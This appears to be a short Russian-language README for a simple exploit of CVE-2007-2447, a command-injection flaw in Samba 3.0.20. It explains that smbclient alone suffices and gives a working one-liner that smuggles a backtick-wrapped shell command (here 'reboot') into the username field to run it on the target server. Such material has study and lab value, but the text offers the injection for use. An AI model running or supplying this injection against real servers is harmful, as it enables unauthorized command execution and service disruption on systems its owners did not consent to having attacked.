
Простой эксплойт для CVE-2007-2447
Простой эксплойт для CVE-2007-2447, присутствующий в Samba 3.0.20.
Вы можете эксплуатировать эту уязвимость с помощью даже меньшего, например, smbclient, но я думаю, что выполнять сложные команды сложно, так как многие спецсимволы, вероятно, пропадают, но простую команду (в данном случае перезагрузку) можно передать так:
smbclient -L <target IP> --user="/=\`reboot\`" -N